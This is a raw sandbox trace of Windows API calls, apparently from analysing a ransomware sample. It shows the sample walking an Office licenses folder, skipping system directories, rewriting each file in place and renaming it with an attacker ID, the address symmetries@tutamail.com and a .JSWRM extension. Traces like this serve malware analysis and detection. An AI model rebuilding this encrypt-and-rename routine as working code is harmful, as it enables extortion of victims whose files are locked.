HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.393] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9a2a0e6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9a2a0e6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9ae8cc6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d72, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectStdO365R_SubTrial-ul-oob.xrm-ms", cAlternateFileName="PR3BA8~1.XRM")) returned 1 [0108.393] lstrcmpiW (lpString1="ProjectStdO365R_SubTrial-ul-oob.xrm-ms", lpString2=".") returned 1 [0108.393] lstrcmpiW (lpString1="ProjectStdO365R_SubTrial-ul-oob.xrm-ms", lpString2="..") returned 1 [0108.393] lstrcmpiW (lpString1="ProjectStdO365R_SubTrial-ul-oob.xrm-ms", lpString2="...") returned 1 [0108.393] lstrcmpiW (lpString1="ProjectStdO365R_SubTrial-ul-oob.xrm-ms", lpString2="windows") returned -1 [0108.393] lstrcmpiW (lpString1="ProjectStdO365R_SubTrial-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0108.393] lstrcmpiW (lpString1="ProjectStdO365R_SubTrial-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0108.393] lstrcmpiW (lpString1="ProjectStdO365R_SubTrial-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0108.393] lstrcmpiW (lpString1="ProjectStdO365R_SubTrial-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.393] lstrcmpiW (lpString1="ProjectStdO365R_SubTrial-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0108.393] lstrcmpiW (lpString1="ProjectStdO365R_SubTrial-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0108.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0108.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdO365R_SubTrial-ul-oob.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0108.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdO365R_SubTrial-ul-oob.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22d0a0, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdO365R_SubTrial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0108.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0108.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0108.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdO365R_SubTrial-ul-oob.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0108.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0108.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdO365R_SubTrial-ul-oob.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22ce70, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdO365R_SubTrial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0108.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0108.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0108.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0108.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0108.394] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdO365R_SubTrial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdo365r_subtrial-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.394] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11634) returned 1 [0108.394] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d70) returned 0x24c1d0 [0108.394] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d70, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d70, lpOverlapped=0x0) returned 1 [0108.396] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.396] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d70, lpOverlapped=0x0) returned 1 [0108.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.397] CloseHandle (hObject=0x45c) returned 1 [0108.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0108.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0108.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0108.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0108.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f720 [0108.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0108.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.397] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdO365R_SubTrial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdo365r_subtrial-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdO365R_SubTrial-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdo365r_subtrial-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0108.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0108.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0108.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0108.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.398] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9b5b3c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9b5b3c9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9dbd976, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x512b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectStdR_Grace-ppd.xrm-ms", cAlternateFileName="PRD50E~1.XRM")) returned 1 [0108.398] lstrcmpiW (lpString1="ProjectStdR_Grace-ppd.xrm-ms", lpString2=".") returned 1 [0108.398] lstrcmpiW (lpString1="ProjectStdR_Grace-ppd.xrm-ms", lpString2="..") returned 1 [0108.398] lstrcmpiW (lpString1="ProjectStdR_Grace-ppd.xrm-ms", lpString2="...") returned 1 [0108.398] lstrcmpiW (lpString1="ProjectStdR_Grace-ppd.xrm-ms", lpString2="windows") returned -1 [0108.398] lstrcmpiW (lpString1="ProjectStdR_Grace-ppd.xrm-ms", lpString2="recovery") returned -1 [0108.398] lstrcmpiW (lpString1="ProjectStdR_Grace-ppd.xrm-ms", lpString2="perflogs") returned 1 [0108.398] lstrcmpiW (lpString1="ProjectStdR_Grace-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0108.398] lstrcmpiW (lpString1="ProjectStdR_Grace-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.398] lstrcmpiW (lpString1="ProjectStdR_Grace-ppd.xrm-ms", lpString2="system volume information") returned -1 [0108.399] lstrcmpiW (lpString1="ProjectStdR_Grace-ppd.xrm-ms", lpString2="msocache") returned 1 [0108.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0108.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_Grace-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0108.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0108.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_Grace-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x240ef8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0108.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0108.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0108.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_Grace-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0108.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0108.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_Grace-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x240fe8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0108.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0108.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0108.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0108.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0108.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_grace-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.400] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20779) returned 1 [0108.400] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.400] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5120) returned 0x24c1d0 [0108.400] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5120, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5120, lpOverlapped=0x0) returned 1 [0108.413] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.413] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5120, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5120, lpOverlapped=0x0) returned 1 [0108.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.414] CloseHandle (hObject=0x45c) returned 1 [0108.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0108.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0108.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0108.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0108.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0108.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0108.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.414] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_grace-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_Grace-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_grace-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0108.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0108.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0108.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0108.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0108.416] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9ac2a76, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9ac2a76, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9b81624, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d5b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectStdR_Grace-ul-oob.xrm-ms", cAlternateFileName="PR34D2~1.XRM")) returned 1 [0108.416] lstrcmpiW (lpString1="ProjectStdR_Grace-ul-oob.xrm-ms", lpString2=".") returned 1 [0108.416] lstrcmpiW (lpString1="ProjectStdR_Grace-ul-oob.xrm-ms", lpString2="..") returned 1 [0108.416] lstrcmpiW (lpString1="ProjectStdR_Grace-ul-oob.xrm-ms", lpString2="...") returned 1 [0108.416] lstrcmpiW (lpString1="ProjectStdR_Grace-ul-oob.xrm-ms", lpString2="windows") returned -1 [0108.416] lstrcmpiW (lpString1="ProjectStdR_Grace-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0108.416] lstrcmpiW (lpString1="ProjectStdR_Grace-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0108.416] lstrcmpiW (lpString1="ProjectStdR_Grace-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0108.416] lstrcmpiW (lpString1="ProjectStdR_Grace-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.416] lstrcmpiW (lpString1="ProjectStdR_Grace-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0108.416] lstrcmpiW (lpString1="ProjectStdR_Grace-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0108.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0108.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_Grace-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0108.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0108.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_Grace-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x241290, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0108.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0108.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0108.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_Grace-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0108.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0108.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_Grace-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x2410d8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0108.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0108.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0108.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0108.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0108.417] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_grace-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.418] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11611) returned 1 [0108.418] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0108.418] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0108.421] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.421] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0108.421] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.421] CloseHandle (hObject=0x45c) returned 1 [0108.421] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0108.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.421] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.421] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.422] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.422] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.422] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0108.422] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.422] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0108.422] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0108.422] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0108.422] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: 